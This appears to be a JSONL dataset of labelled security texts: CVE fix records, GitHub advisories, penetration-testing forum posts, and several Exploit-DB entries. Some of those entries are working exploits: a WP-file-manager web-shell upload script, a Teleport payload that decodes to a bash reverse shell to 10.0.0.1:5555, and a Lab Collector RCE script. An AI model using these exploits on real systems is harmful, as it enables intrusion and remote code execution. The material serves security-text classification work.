latest version of the SDK. Those who believe a local user might have opened a handle using this race condition, should remove the affected database files and regenerate all application keys. Users should upgrade to b2-sdk-python 1.14.1 or later.'}]\n\nFix commit: Merge pull request from GHSA-p867-fxfr-ph2w\n\n* Fix setting permissions for local sqlite database\n\nThanks to Jan Schejbal for responsible disclosure!\n\nThere used to be a brief moment between creation of the sqlite\ndatabase and applying chmod, now there is no such delay.\n\n* Rename self.home to self.test_home in tests\n\n* Actually call the test cleanup\n\n* Add a test for sqlite permissions\n\n* Skip the sqlite chmod test on Windows", "source": "cvefixes", "timestamp": "2022-02-23", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "49d24b5c28bf8e4e3cd4", "text": "Just solved this. To anyone stuck at this place. The only hint I think I would give in public is to notice that your reverse shell isn’t fully interactive. It is possible and necessary to have a fully interactive tty shell.", "source": "hackthebox", "timestamp": "2022-01-02", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "a22423ef7077f0f6b87c", "text": "does anybody know what the ^ does? i can’t find the answer online.", "source": "hackthebox", "timestamp": "2023-12-28", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "bb04343996b992744d18", "text": "katello SQL Injection vulnerability\n\n[Severity: MEDIUM]\n\nA SQL injection flaw was found in katello's errata-related API. An authenticated remote attacker can craft input data to force a malformed SQL query to the backend database, which will leak internal IDs. This is issue is related to an incomplete fix for CVE-2016-3072. Version 3.10 and older is vulnerable.", "source": "github_advisory", "timestamp": "2022-05-13", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "0a8af71a3585bafe1301", "text": "If you just want to reset fault codes, buy an OBD2 reader, they are about £6 - ($10) and connect to a mobile phone, either by WiFi (shows as a network to connect too), or via bluetooth to read codes and reset them. As for car hacking, they are embedded sytems, so all data is held in eeprom chips, this makes reading and writing data a fairly slow process.", "source": "parrotsec", "timestamp": "2023-04-04", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "2292a7155145173bdf3d", "text": "CVE: CVE-2022-1238\n\n[{'lang': 'en', 'value': 'Heap-based Buffer Overflow in libr/bin/format/ne/ne.c in GitHub repository radareorg/radare2 prior to 5.6.8. This vulnerability is heap overflow and may be exploitable. For more general description of heap buffer overflow, see [CWE](https://cwe.mitre.org/data/definitions/122.html).'}]\n\nFix commit: Fix another oobread segfault in the NE bin parser ##crash\n\n* Reported by @han0nly via huntr.dev\n* Reproducers: sample1 sample2 sample3\n* BountyID: 47422cdf-aad2-4405-a6a1-6f63a3a93200", "source": "cvefixes", "timestamp": "2022-04-06", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "c44d8ba19d13a19d7586", "text": "Ok so I’ve been banging my head against a wall here. Every operand except && seems to be blocked. A sub shell is possible, so I started fiddling with sending bash commands encoded in base64. I tried an ls payload at first, and got index.php and config.php as the only extra files visible. Now for the weird part, when I send a payload like this, it breaks the website. I can’t send a new payload and if I go back to the website IP I get this: Screenshot from 2022-11-06 12-15-31 560×227 19.7 KB The payload looks like this: I can read the config file and any attempt to move any of the files after this results in a Malicious error. To try another payload I have to restart the server. I’ve tried a payload to cat flag.txt as well but it responds with ‘flag.txt:no such file or directory’. The server breaks and needs to be restarted after that. The flag payload contains ‘cat flag.txt’ encoded in base64: Any help would be greatly appreciated!", "source": "hackthebox", "timestamp": "2022-11-06", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "57842e25fc86e5344e70", "text": "Evil twin portal specific variant\n\nHi guys! I don’t want to create classical evil twin portal. Pen tested it, works, al least airgeddon one and fluxion are decent. I want to create completely the same working portal as evil twin, except I want to give it a custom name. So it works the same, but the name of the AP - essid is as I see fit. That scripts don’t offer that option. I could rewrite them, but that would be hassle. Is someone willing to give me an advice how could I do it fast, with not too much hassle? Or at least in which direction should I look, to learn it myself? I tried with mdk3 and created a fake AP. Works nicely, except it would be better if it would capture all wifi password login attempts. I can do mdk4, mdk3 or classic deauth separately. I use Kali and Parrot Os for pen testing and Alpha NHA. Thank you!", "source": "hackersploit", "timestamp": "2022-05-11", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "1cfc76e5531e37ceb5f5", "text": "Thank you for the comment. I completely agree with these points. But in reality, we can't keep this list too short. I have researched many blogs, and white papers, and analysed many high-performing websites to arrive at my final list. Here is mine. SEO Speed (Short loading time) UI & UX Relevancy (Information) Easy navigation I have seen many pages violate these factors to attract traffic, but in reality, they are jeopardising their online reputation. When service companies prepare their service pages or even publish the blog, these key factors play a crucial role in ranking organically. When preparing pages for ai service, custom software development, mobile app development etc visitors always look for a bundle of information in swift time. That is why it is important to pay attention to the on-page content and other performance factors.", "source": "go4expert", "timestamp": "2022-07-25", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "984a4a1a5cc0c85cb386", "text": "Hello! I got hung up on the task “Bruteforcing Passwords”. It seems nothing complicated, one question: “Using rockyou-50.txt as password wordlist and tb user as the username, find the policy and filter out strings that don’t respect it. What is the valid password for the htb user account?” I created my own table, defined a password policy. Filtered out everything unnecessary. Even the list turned out to be small. But persistently the password, which should be correct, does not fit in any way. Strangely simple, how did you solve this problem?", "source": "hackthebox", "timestamp": "2022-07-08", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "094230e3769512f77f66", "text": "Network adapter for a beginner\n\nHi, I’m a student and I’m just entering the huge world of cybersecurity. At the moment I have a Lenovo Ideapad laptop, and it works decently. Looking at different penetration testing tutorials I see that many recommend to buy a network adapter, so you can have the possibility to use the network card in monitor mode or do packet injection. The laptop’s network adapter can get into monitor mode (unfortunately I have to reboot the computer to get it back into managed mode), but I haven’t tried if it supports packet injection yet. Would you advise me to buy a network adapter, obviously not a very powerful one (at least for now), although it can already do several things? Thanks in advance", "source": "hackersploit", "timestamp": "2022-02-18", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "8a53f682c45a99686927", "text": "CVE: CVE-2021-3656\n\n[{'lang': 'en', 'value': 'A flaw was found in the KVM\\'s AMD code for supporting SVM nested virtualization. The flaw occurs when processing the VMCB (virtual machine control block) provided by the L1 guest to spawn/handle a nested guest (L2). Due to improper validation of the \"virt_ext\" field, this issue could allow a malicious L1 to disable both VMLOAD/VMSAVE intercepts and VLS (Virtual VMLOAD/VMSAVE) for the L2 guest. As a result, the L2 guest would be allowed to read/write physical pages of the host, resulting in a crash of the entire system, leak of sensitive data or potential guest-to-host escape.'}]\n\nFix commit: KVM: nSVM: always intercept VMLOAD/VMSAVE when nested (CVE-2021-3656)\n\nIf L1 disables VMLOAD/VMSAVE intercepts, and doesn't enable\nVirtual VMLOAD/VMSAVE (currently not supported for the nested hypervisor),\nthen VMLOAD/VMSAVE must operate on the L1 physical memory, which is only\npossible by making L0 intercept these instructions.\n\nFailure to do so allowed the nested guest to run VMLOAD/VMSAVE unintercepted,\nand thus read/write portions of the host physical memory.\n\nFixes: 89c8a4984fc9 (\"KVM: SVM: Enable Virtual VMLOAD VMSAVE feature\")\n\nSuggested-by: Paolo Bonzini \nSigned-off-by: Maxim Levitsky \nSigned-off-by: Paolo Bonzini ", "source": "cvefixes", "timestamp": "2022-03-04", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "8669289dc0e6d21219e6", "text": "CVE: CVE-2022-31072\n\n[{'lang': 'en', 'value': 'Octokit is a Ruby toolkit for the GitHub API. Versions 4.23.0 and 4.24.0 of the octokit gem were published containing world-writeable files. Specifically, the gem was packed with files having their permissions set to `-rw-rw-rw-` (i.e. 0666) instead of `rw-r--r--` (i.e. 0644). This means everyone who is not the owner (Group and Public) with access to the instance where this release had been installed could modify the world-writable files from this gem. This issue is patched in Octokit 4.25.0. Two workarounds are available. Users can use the previous version of the gem, v4.22.0. Alternatively, users can modify the file permissions manually until they are able to upgrade to the latest version.'}]\n\nFix commit: Merge pull request #1446 from octokit/updates-release-steps-ic\n\nAdds details on how to run a manual file integrity check", "source": "cvefixes", "timestamp": "2022-06-15", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "a1c9e00fd1a07947d4fb", "text": "CVE: CVE-2022-2182\n\n[{'lang': 'en', 'value': 'Heap-based Buffer Overflow in GitHub repository vim/vim prior to 8.2.'}]\n\nFix commit: patch 8.2.5150: read past the end of the first line with \":0;'{\"\n\nProblem: Read past the end of the first line with \":0;'{\".\nSolution: When on line zero check the column is valid for line one.", "source": "cvefixes", "timestamp": "2022-06-23", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "875fd81b5663c7a80eb9", "text": "CVE: CVE-2021-4043\n\n[{'lang': 'en', 'value': 'NULL Pointer Dereference in GitHub repository gpac/gpac prior to 1.1.0.'}]\n\nFix commit: fixed #2092", "source": "cvefixes", "timestamp": "2022-02-04", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "41e1aca145ff849b2b11", "text": "CVE: CVE-2020-27787\n\n[{'lang': 'en', 'value': 'A Segmentaation fault was found in UPX in invert_pt_dynamic() function in p_lx_elf.cpp. An attacker with a crafted input file allows invalid memory address access that could lead to a denial of service.'}]\n\nFix commit: Detect 0==DT_SYMTAB in invert_pt_dynamic()\n\nhttps://github.com/upx/upx/issues/333\n\tmodified: p_lx_elf.cpp", "source": "cvefixes", "timestamp": "2022-08-18", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "506574a70a697f7915cb", "text": "I installed the TheRatFat but I heven’t any generated file in output. Why? Doesn’t work?", "source": "parrotsec", "timestamp": "2022-03-08", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "ce75d9f102fb65241b04", "text": "Hi @Darryl It looks like this page has an answer: everything.curl.dev SSLKEYLOGFILE", "source": "parrotsec", "timestamp": "2023-05-11", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "956ec5b17a0036fa2eb6", "text": "Keep in mind that if you are using two or more switches together, you only need one “-”. You have -X -r and have two “-” so that’s incorrect. You have -r (Filename) and then -X. That’s incorrect. Then you have -rX. Now look at that one one for a second. In -rX you are telling tcpdump to read first THEN after reading do X. But the command wont work because you interruped the read command with X. Getting the ideas here. Try flipping -rX and same file name. Also the question asked for the command, not the swithces. So it would be sudo tcpdump [your switches] [file name]. sudp tcpdump-** /file name 1/file pcap", "source": "hackthebox", "timestamp": "2022-05-17", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "4b2b6849ba9512f5824e", "text": "CVE: CVE-2022-24840\n\n[{'lang': 'en', 'value': 'django-s3file is a lightweight file upload input for Django and Amazon S3 . In versions prior to 5.5.1 it was possible to traverse the entire AWS S3 bucket and in most cases to access or delete files. If the `AWS_LOCATION` setting was set, traversal was limited to that location only. The issue was discovered by the maintainer. There were no reports of the vulnerability being known to or exploited by a third party, prior to the release of the patch. The vulnerability has been fixed in version 5.5.1 and above. There is no feasible workaround. We must urge all users to immediately updated to a patched version.'}]\n\nFix commit: Fix CVE-XXXX-XXXX -- Fix Path Traversal security vulnerability", "source": "cvefixes", "timestamp": "2022-06-09", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "3946be1a00ce6a23a7d7", "text": "Can you show the syntax that you usted to get the flag? To know what and why you’re stuck. If you’re doing something wrong. For the last, do you upload the right payload in the “404.php” on theme editor? Feel free to DM me.", "source": "hackthebox", "timestamp": "2022-01-19", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "d87cf416ef610a06c10a", "text": "There is a free tool online called Email-Extractor Email Extractor - Online tool for extracting any email address (email-checker.net) That can extract email addresses from the text content. I hope you found this helpful", "source": "hackersploit", "timestamp": "2022-03-30", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "348573433f21a81ff569", "text": "WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE\n\n#!/usr/bin/env\n\n# Exploit Title: WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE\n# Date: [ 22-01-2023 ]\n# Exploit Author: [BLY]\n# Vendor Homepage: [https://wpscan.com/vulnerability/10389]\n# Version: [ File Manager plugin 6.0-6.9]\n# Tested on: [ Debian ]\n# CVE : [ CVE-2020-25213 ]\n\nimport sys,signal,time,requests\nfrom bs4 import BeautifulSoup\n#from pprint import pprint\n\ndef handler(sig,frame):\n\tprint (\"[!]Saliendo\")\n\tsys.exit(1)\n\nsignal.signal(signal.SIGINT,handler)\n\ndef commandexec(command):\n\n\texec_url = url+\"/wp-content/plugins/wp-file-manager/lib/php/../files/shell.php\"\n\tparams = {\n\t\t\"cmd\":command\n\t}\n\n\tr=requests.get(exec_url,params=params)\n\n\tsoup = BeautifulSoup(r.text, 'html.parser')\n\ttext = soup.get_text()\n\n\tprint (text)\ndef exploit():\n\n\tglobal url\n\n\turl = sys.argv[1]\n\tcommand = sys.argv[2]\n\tupload_url = url+\"/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php\"\n\n\theaders = {\n\t\t\t'content-type': \"multipart/form-data; boundary=----WebKitFormBoundaryvToPIGAB0m9SB1Ww\",\n\t\t\t'Connection': \"close\"\n\t}\n\n\tpayload = \"------WebKitFormBoundaryvToPIGAB0m9SB1Ww\\r\\nContent-Disposition: form-data; name=\\\"cmd\\\"\\r\\n\\r\\nupload\\r\\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww\\r\\nContent-Disposition: form-data; name=\\\"target\\\"\\r\\n\\r\\nl1_Lw\\r\\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww\\r\\nContent-Disposition: form-data; name=\\\"upload[]\\\"; filename=\\\"shell.php\\\"\\r\\nContent-Type: application/x-php\\r\\n\\r\\n\\\" . shell_exec($_REQUEST['cmd']) . \\\"\\\"; ?>\\r\\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww--\"\n\n\ttry:\n\t\tr=requests.post(upload_url,data=payload,headers=headers)\n\t\t#pprint(r.json())\n\t\tcommandexec(command)\n\texcept:\n\t\tprint(\"[!] Algo ha salido mal...\")\n\n\n\n\ndef help():\n\n\tprint (\"\\n[*] Uso: python3\",sys.argv[0],\"\\\"url\\\" \\\"comando\\\"\")\n\tprint (\"[!] Ejemplo: python3\",sys.argv[0],\"http://wordpress.local/ id\")\n\n\n\n\nif __name__ == '__main__':\n\n\tif len(sys.argv) != 3:\n\t\thelp()\n\n\telse:\n\t\texploit()", "source": "exploitdb", "timestamp": "2023-04-03", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "e143e7f5b3dab19382e6", "text": "Unauthenticated users can exploit an enumeration vulnerability in Harbor (CVE-2019-19030)\n\n[Severity: MEDIUM]\n\n# Impact\nSean Wright from Secureworks has discovered an enumeration vulnerability. An attacker can make use of the Harbor API to make unauthenticated calls to the Harbor instance. Based on the HTTP status code in the response, an attacker is then able to work out which resources exist, and which do not. This would likely be accomplished by either providing a wordlist or enumerating through a sequence an\nunauthenticated attacker is able to enumerate resources on the system. This provides them with information such as existing projects, repositories, etc.\n\nThe vulnerability was immediately fixed by the Harbor team. \n\n# Issue \nThe following API resources where found to be vulnerable to enumeration attacks:\n/api/chartrepo/{repo}/prov (POST)\n/api/chartrepo/{repo}/charts (GET, POST)\n/api/chartrepo/{repo}/charts/{name} (GET, DELETE)\n/api/chartrepo/{repo}/charts/{name}/{version} (GET, DELETE)\n/api/labels?name={name}&scope=p (GET)\n/api/repositories?project_id={id} (GET)\n/api/repositories/{repo_name}/ (GET, PUT, DELETE)\n/api/repositories/{repo_name}/tags (GET)\n/api/repositories/{repo_name}/tags/{tag}/manifest?version={version} (GET)\n/api/repositories/{repo_name/{tag}/labels (GET)\n/api/projects?project_name={name} (HEAD)\n/api/projects/{project_id}/summary (GET)\n/api/projects/{project_id}/logs (GET)\n/api/projects/{project_id} (GET, PUT, DELETE)\n/api/projects/{project_id}/metadatas (GET, POST)\n/api/projects/{project_id}/metadatas/{metadata_name} (GET, PUT)\n\n# Known Attack Vectors\nSuccessful exploitation of this issue will lead to bad actors identifying which resources exist in Harbor without requiring authentication for the Harbor API.\n\n# Patches\nIf your product uses the affected releases of Harbor, update to version 1.10.3 or 2.0.1 to patch this issue immediately.\n\nhttps://github.com/goharbor/harbor/releases/tag/v1.10.3\nhttps://github.com/goharbor/harbor/releases/tag/v2.0.1\n\n# Workarounds\nThere is no known workaround\n\n# For more information\nIf you have any questions or comments about this advisory, contact cncf-harbor-security@lists.cncf.io\nView our security policy at https://github.com/goharbor/harbor/security/policy", "source": "github_advisory", "timestamp": "2022-02-11", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "742136419922c82c5333", "text": "Ctf command\n\nHi there, I’m trying to find some people, who can help me with experience in real CTF. I’m not new in CTF, but I want to see how cool people solve challenges in real CTF, maybe even play CTF with them.))))))", "source": "hackthebox", "timestamp": "2023-07-29", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "015ff31cdc16b45a1703", "text": "MCL-Net 4.3.5.8788 - Information Disclosure\n\n# Exploit Title: MCL-Net 4.3.5.8788 - Information Disclosure\n# Date: 5/31/2023\n# Exploit Author: Victor A. Morales, GM Sectec Inc.\n# Vendor Homepage: https://www.mcl-mobilityplatform.com/net.php\n# Version: 4.3.5.8788 (other versions may be affected)\n# Tested on: Microsoft Windows 10 Pro\n# CVE: CVE-2023-34834\n\nDescription:\nDirectory browsing vulnerability in MCL-Net version 4.3.5.8788 webserver running on default port 5080, allows attackers to gain sensitive information about the configured databases via the \"/file\" endpoint.\n\nSteps to reproduce:\n1. Navigate to the webserver on default port 5080, where \"Index of Services\" will disclose directories, including the \"/file\" directory.\n2. Browse to the \"/file\" directory and database entry folders configured\n3. The \"AdoInfo.txt\" file will contain the database connection strings in plaintext for the configured database. Other files containing database information are also available inside the directory.", "source": "exploitdb", "timestamp": "2023-06-23", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "2f046755e0931610ea1b", "text": "This is not that kind of forum. If you want these kind of activities performed you best turn your browser elsewhere.", "source": "hackersploit", "timestamp": "2022-06-04", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "bb986001c6775f5f5409", "text": "CVE: CVE-2022-33172\n\n[{'lang': 'en', 'value': \"de.fac2 1.34 allows bypassing the User Presence protection mechanism when there is malware on the victim's PC.\"}]\n\nFix commit: Update README.md", "source": "cvefixes", "timestamp": "2022-08-24", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "e1e4d30b411b81de51cd", "text": "wifite returning mac addressed that i can not look up\n\nI am trying to learn hacking to move up in our company. I downloaded parrot 5 and bought an alfa with the 8812 chipset. I ran wifite (i set some networks in my house to practice on) but I am also getting 6 mac addresses in the list 76:AC:B9:BE:F8:92 76:AC:B9:39:60:CD 1E:30:08:35:66:A3 9A:8A:20:54:43:5A C6:98:5C:98:DD:D0 8E:49:62:44:89:31 I can find no information on these. Does anyone have any idea what they are are or why I am getting them", "source": "parrotsec", "timestamp": "2022-04-30", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "18e1fc6ca956cfef95c7", "text": "You are on the right track with the User agent. Play around with your inputs. Maybe make them simple at first just to make sure you can actually run code. There is a risk that you can enter in a user agent which breaks the admin page when it tries to read the access log, this means that any agent text entered after the one that broke the page will have no effect because the page breaks before it can read any new agents. You will need to restart the assessment machine if that happens.", "source": "hackthebox", "timestamp": "2022-11-02", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "1d15a71c81cd81984b5a", "text": "Teleport v10.1.1 - Remote Code Execution (RCE)\n\n# Exploit Title: Teleport v10.1.1 - Remote Code Execution (RCE)\n# Date: 08/01/2022\n# Exploit Author: Brandon Roach & Brian Landrum\n# Vendor Homepage: https://goteleport.com\n# Software Link: https://github.com/gravitational/teleport\n# Version: < 10.1.2\n# Tested on: Linux\n# CVE: CVE-2022-36633\n\nProof of Concept (payload):\nhttps://teleport.site.com/scripts/%22%0a%2f%62%69%6e%2=\nf%62%61%73%68%20%2d%6c%20%3e%20%2f%64%65%76%2f%74%63%70%2f%31%30%2e%30%2e%3=\n0%2e%31%2f%35%35%35%35%20%30%3c%26%31%20%32%3e%26%31%20%23/install-node.sh?=\nmethod=3Diam\n\n\nDecoded payload:\n\"\n/bin/bash -l > /dev/tcp/10.0.0.1/5555 0<&1 2>&1 #", "source": "exploitdb", "timestamp": "2022-09-23", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "7f35eedecf469e9175c0", "text": "Agilebio Lab Collector Electronic Lab Notebook v4.234 - Remote Code Execution (RCE)\n\n# Exploit Title: Agilebio Lab Collector Electronic Lab Notebook v4.234 - Remote Code Execution (RCE)\n# Date: 2023-02-28\n# Exploit Author: Anthony Cole\n# Vendor Homepage: https://labcollector.com/labcollector-lims/add-ons/eln-electronic-lab-notebook/\n# Version: v4.234\n# Contact: http://twitter.com/acole76\n# Website: http://twitter.com/acole76\n# Tested on: PHP/MYSQL\n# CVE: CVE-2023-24217\n# Category: webapps\n#\n# Lab Collector is a software written in PHP by Agilebio. Version v4.234 allows an authenticated user to execute os commands on the underlying operating system.\n#\n\nfrom argparse import ArgumentParser\nfrom requests import Session\nfrom random import choice\nfrom string import ascii_lowercase, ascii_uppercase, digits\nimport re\nfrom base64 import b64encode\nfrom urllib.parse import quote_plus\n\nsess:Session = Session()\ncookies = {}\nheaders = {}\nstate = {}\n\ndef random_string(length:int) -> str:\n return \"\".join(choice(ascii_lowercase+ascii_uppercase+digits) for i in range(length))\n\ndef login(base_url:str, username:str, password:str) -> bool:\n data = {\"login\": username, \"pass\": password, \"Submit\":\"\", \"action\":\"login\"}\n headers[\"Referer\"] = f\"{base_url}/login.php?%2Findex.php%3Fcontroller%3Duser_profile\"\n res = sess.post(f\"{base_url}/login.php\", data=data, headers=headers)\n\n if(\"My profile\" in res.text):\n return res.text\n else:\n return None\n\ndef logout(base_url:str) -> bool:\n headers[\"Referer\"] = f\"{base_url}//index.php?controller=user_profile&subcontroller=update\"\n sess.get(f\"{base_url}/login.php?%2Findex.php%3Fcontroller%3Duser_profile%26subcontroller%3Dupdate\",headers=headers)\n\ndef extract_field_value(contents, name):\n value = re.findall(f'name=\"{name}\" value=\"(.*)\"', contents)\n if(len(value)):\n return value[0]\n else:\n return \"\"\n\ndef get_profile(html:str):\n return {\n \"contact_name\": extract_field_value(html, \"contact_name\"),\n \"contact_lab\": extract_field_value(html, \"contact_lab\"),\n \"contact_address\": extract_field_value(html, \"contact_address\"),\n \"contact_city\": extract_field_value(html, \"contact_city\"),\n \"contact_zip\": extract_field_value(html, \"contact_zip\"),\n \"contact_country\": extract_field_value(html, \"contact_country\"),\n \"contact_tel\": extract_field_value(html, \"contact_tel\"),\n \"contact_email\": extract_field_value(html, \"contact_email\")\n }\n\n\ndef update_profile(base_url:str, wrapper:str, param:str, data:dict) -> bool:\n headers[\"Referer\"] = f\"{base_url}/index.php?controller=user_profile&subcontroller=update\"\n res = sess.post(f\"{base_url}/index.php?controller=user_profile&subcontroller=update\", data=data, headers=headers)\n return True\n\ndef execute_command(base_url:str, wrapper:str, param:str, session_path:str, cmd:str):\n session_file = sess.cookies.get(\"PHPSESSID\")\n headers[\"Referer\"] = f\"{base_url}/login.php?%2F\"\n page = f\"../../../../../..{session_path}/sess_{session_file}\"\n res = sess.get(f\"{base_url}/extra_modules/eln/index.php?page={page}&action=edit&id=1&{param}={quote_plus(cmd)}\", headers=headers)\n return parse_output(res.text, wrapper)\n\ndef exploit(args) -> None:\n wrapper = random_string(5)\n param = random_string(3)\n html = login(args.url, args.login_username, args.login_password)\n\n if(html == None):\n print(\"unable to login\")\n return False\n\n clean = get_profile(html)\n data = get_profile(html)\n tag = b64encode(wrapper.encode()).decode()\n payload = f\"\"\n\n data[\"contact_name\"] = payload #inject payload in name field\n\n if(update_profile(args.url, wrapper, param, data)):\n login(args.url, args.login_username, args.login_password) # reload the session w/ our payload\n print(execute_command(args.url, wrapper, param, args.sessions, args.cmd))\n update_profile(args.url, wrapper, param, clean) # revert the profile\n\n logout(args.url)\n\n\ndef parse_output(con", "source": "exploitdb", "timestamp": "2023-04-06", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "b93e7b53e0f18d184213", "text": "To the question: Create an “If-Else” condition in the “For”-Loop of the “Exercise Script” that prints you the number of characters of the 35th generated value of the variable “var”. Submit the number as the answer. The amount you need to go up to might vary. Some had 28 , I had 35 , when you read this yours may be different Psudo code which worked for me: for counter in {1 up to the amount you need to count} do print the counter for Diagnostics var=$(echo $var | base64) if the counter is equal to \"the amount you need to count up to\" then echo $var | wc -c fi done echo $var | wc -c will print a 4/5/6/n digit number which is your answer. I was trying answers like “5” because it was a 5-digit number which was produced. That was wrong. NOTE: Run this on the PWN box, not your local machine because the hashing engine may be different to the one which generates in the answer Good luck !", "source": "hackthebox", "timestamp": "2023-03-11", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "b30fb4e8bfc900c92822", "text": "Thank you! plus: we are in the machine already, so an exec is enough tho", "source": "hackthebox", "timestamp": "2022-06-24", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "cd3db1f74bd46226131c", "text": "runc AppArmor bypass with symlinked /proc\n\n[Severity: MEDIUM]\n\n### Impact\nIt was found that AppArmor, and potentially SELinux, can be bypassed when `/proc` inside the container is symlinked with a specific mount configuration.\n\n### Patches\nFixed in runc v1.1.5, by prohibiting symlinked `/proc`: https://github.com/opencontainers/runc/pull/3785\n\nThis PR fixes CVE-2023-27561 as well.\n\n### Workarounds\nAvoid using an untrusted container image.\n\n", "source": "github_advisory", "timestamp": "2023-03-30", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "490a56fb0a9ee9d3b58d", "text": "you need to spawn the target system then ssh into the ip address which spawned", "source": "hackthebox", "timestamp": "2023-06-26", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "2145513ed952d0b1f0e0", "text": "about enumeration\n\nwhen i try this code nmap scan 738×52 21.7 KB i get this benim 825×247 45.1 KB but in enumeration video hackersploit gets this whats the problem nmap1 1217×746 80.5 KB", "source": "hackersploit", "timestamp": "2022-10-21", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "8b1e1dc51af5ab46c707", "text": "CVE: CVE-2022-21699\n\n[{'lang': 'en', 'value': 'IPython (Interactive Python) is a command shell for interactive computing in multiple programming languages, originally developed for the Python programming language. Affected versions are subject to an arbitrary code execution vulnerability achieved by not properly managing cross user temporary files. This vulnerability allows one user to run code as another on the same machine. All users are advised to upgrade.'}]\n\nFix commit: Merge pull request from GHSA-pq7m-3gw7-gq5x\n\nFIX CVE-2022-21699", "source": "cvefixes", "timestamp": "2022-01-19", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "de43c459b253c1a81511", "text": "CVE: CVE-2022-23568\n\n[{'lang': 'en', 'value': 'Tensorflow is an Open Source Machine Learning Framework. The implementation of `AddManySparseToTensorsMap` is vulnerable to an integer overflow which results in a `CHECK`-fail when building new `TensorShape` objects (so, an assert failure based denial of service). We are missing some validation on the shapes of the input tensors as well as directly constructing a large `TensorShape` with user-provided dimensions. The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as these are also affected and still in supported range.'}]\n\nFix commit: Add missing validation to `AddManySparseToTensorsMap`.\n\nSparse tensors have a set of requirements for the 3 components and not all of them were checked.\n\nPiperOrigin-RevId: 415358027\nChange-Id: I96cbb672999cd1da772c22fabbd15507e32e12dc", "source": "cvefixes", "timestamp": "2022-02-03", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "2a1878ddca09607fa9aa", "text": "CVE: CVE-2022-1537\n\n[{'lang': 'en', 'value': \"file.copy operations in GruntJS are vulnerable to a TOCTOU race condition leading to arbitrary file write in GitHub repository gruntjs/grunt prior to 1.5.3. This vulnerability is capable of arbitrary file writes which can lead to local privilege escalation to the GruntJS user if a lower-privileged user has write access to both source and destination directories as the lower-privileged user can create a symlink to the GruntJS user's .bashrc file or replace /etc/shadow file if the GruntJS user is root.\"}]\n\nFix commit: Patch up race condition in symlink copying.", "source": "cvefixes", "timestamp": "2022-05-10", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "39729e40c726cf98e131", "text": "WordPress Plugin Perfect Survey - 1.5.1 - SQLi (Unauthenticated)\n\n# Exploit Title: WordPress Plugin Perfect Survey - 1.5.1 - SQLi (Unauthenticated)\n# Date 18.02.2022\n# Exploit Author: Ron Jost (Hacker5preme)\n# Vendor Homepage: https://www.getperfectsurvey.com/\n# Software Link: https://web.archive.org/web/20210817031040/https://downloads.wordpress.org/plugin/perfect-survey.1.5.1.zip\n# Version: < 1.5.2\n# Tested on: Ubuntu 20.04\n# CVE: CVE-2021-24762\n# CWE: CWE-89\n# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24762/README.md\n\n'''\nDescription:\nThe Perfect Survey WordPress plugin before 1.5.2 does not validate and escape the question_id GET parameter before\nusing it in a SQL statement in the get_question AJAX action, allowing unauthenticated users to perform SQL injection.\n'''\n\nbanner = '''\n\n ___ _ _ ______ ____ ____ ____ ___ ____ _ _ _______ _____ ____\n _(___)_ (_) (_)(______) _(____) (____) _(____) (___) _(____)(_) (_)(_______)(_____) _(____)\n(_) (_)(_) (_)(_)__ ______(_) _(_)(_) (_)(_) _(_)(_)(_) ______(_) _(_)(_)__(_)_ _(_)(_)___ (_) _(_)\n(_) _ (_) (_)(____)(______) _(_) (_) (_) _(_) (_)(______) _(_) (________)_(_) (_____)_ _(_)\n(_)___(_) 